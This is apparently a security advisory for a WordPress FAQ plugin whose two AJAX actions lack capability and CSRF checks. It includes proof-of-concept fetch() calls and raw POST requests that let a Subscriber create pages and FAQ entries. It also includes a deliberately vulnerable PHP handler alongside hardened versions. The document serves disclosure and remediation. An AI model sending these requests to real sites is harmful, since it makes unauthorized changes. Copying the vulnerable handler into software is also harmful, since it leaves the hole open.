The plugin does not have capability and CSRF checks in the ewd_ufaq_welcome_add_faq and ewd_ufaq_welcome_add_faq_page AJAX actions, which are available to any authenticated user. As a result, any user with a role as low as Subscriber could create FAQ pages and FAQ questions.
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"ewd_ufaq_welcome_add_faq_page", "faq_page_title": "hello"}),
"method": "POST",
"credentials": "include"
});
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Cookie: [any authenticated user]
action=ewd_ufaq_welcome_add_faq_page&faq_page_title=hello
The FAQ page will be created as a regular WordPress page (listed at /wp-admin/edit.php?post_type=page&orderby=date&order=desc).
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"ewd_ufaq_welcome_add_faq", "faq_question": "Have you ever heard the wolf cry to the blue corn moon?", "faq_answer": "Yes"}),
"method": "POST",
"credentials": "include"
});
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 117
Connection: close
Cookie: [any authenticated user]
action=ewd_ufaq_welcome_add_faq&faq_question=Have+you+ever+heard+the+wolf+cry+to+the+blue+corn+moon%3F&faq_answer=Yes
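For reference, the following PHP shows what the two handlers above lack and how a plugin author would close both gaps. This is an added illustration, not the plugin's own code: the function names, the `ewd_ufaq_welcome` nonce action, the `nonce` request field and the `ufaq` post type are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Handler names, the nonce action
// name, the 'nonce' request field and the 'ufaq' post type are assumptions.

// Before: the pattern the advisory describes. Any logged-in user reaches the
// wp_ajax_* hook and nothing checks a nonce or a capability before the insert,
// so a Subscriber (or a cross-site request riding a Subscriber's cookie)
// creates a published page.
function example_ufaq_add_faq_page_vulnerable() {
    $title = isset( $_POST['faq_page_title'] ) ? sanitize_text_field( wp_unslash( $_POST['faq_page_title'] ) ) : '';
    $id    = wp_insert_post( array(
        'post_type'   => 'page',
        'post_status' => 'publish',
        'post_title'  => $title,
    ) );
    wp_send_json_success( array( 'id' => $id ) );
}

// After: verify a nonce bound to this action (stops CSRF) and a capability that
// matches what the handler does (stops low-privilege users), then fail closed.
function example_ufaq_add_faq_page_hardened() {
    // The admin page emits the nonce with wp_create_nonce( 'ewd_ufaq_welcome' )
    // and the client posts it as 'nonce'; check_ajax_referer() dies with 403
    // when it is missing, expired or bound to another action or user.
    check_ajax_referer( 'ewd_ufaq_welcome', 'nonce' );

    // Creating a published page requires publish_pages (Editor and above by
    // default); a Subscriber fails here even with a valid nonce.
    if ( ! current_user_can( 'publish_pages' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    $title = isset( $_POST['faq_page_title'] ) ? sanitize_text_field( wp_unslash( $_POST['faq_page_title'] ) ) : '';
    if ( '' === $title ) {
        wp_send_json_error( array( 'message' => 'Missing title' ), 400 );
    }

    // Pass $wp_error = true so failures surface instead of returning 0.
    $id = wp_insert_post( array(
        'post_type'   => 'page',
        'post_status' => 'publish',
        'post_title'  => $title,
    ), true );
    if ( is_wp_error( $id ) ) {
        wp_send_json_error( array( 'message' => $id->get_error_message() ), 500 );
    }
    wp_send_json_success( array( 'id' => $id ) );
}

// Same treatment for the FAQ question handler. 'ufaq' is an assumed custom post
// type; publish_posts is used as the matching capability for publishing it.
function example_ufaq_add_faq_hardened() {
    check_ajax_referer( 'ewd_ufaq_welcome', 'nonce' );
    if ( ! current_user_can( 'publish_posts' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    $question = isset( $_POST['faq_question'] ) ? sanitize_text_field( wp_unslash( $_POST['faq_question'] ) ) : '';
    $answer   = isset( $_POST['faq_answer'] ) ? wp_kses_post( wp_unslash( $_POST['faq_answer'] ) ) : '';
    if ( '' === $question ) {
        wp_send_json_error( array( 'message' => 'Missing question' ), 400 );
    }

    $id = wp_insert_post( array(
        'post_type'    => 'ufaq',
        'post_status'  => 'publish',
        'post_title'   => $question,
        'post_content' => $answer,
    ), true );
    if ( is_wp_error( $id ) ) {
        wp_send_json_error( array( 'message' => $id->get_error_message() ), 500 );
    }
    wp_send_json_success( array( 'id' => $id ) );
}

// Register only the hardened handlers on the wp_ajax_ (authenticated) hook.
// There is deliberately no wp_ajax_nopriv_ registration, so unauthenticated
// requests never reach them.
add_action( 'wp_ajax_ewd_ufaq_welcome_add_faq_page', 'example_ufaq_add_faq_page_hardened' );
add_action( 'wp_ajax_ewd_ufaq_welcome_add_faq', 'example_ufaq_add_faq_hardened' );
```

The two checks are independent and both are needed: a nonce alone still lets any Subscriber who can load the admin page obtain a valid token and call the action, and a capability check alone still lets a cross-site request succeed whenever an Editor is logged in. The capability should be the one WordPress itself requires for the resulting operation (here, publishing a page or post), not a generic `read` that every role holds.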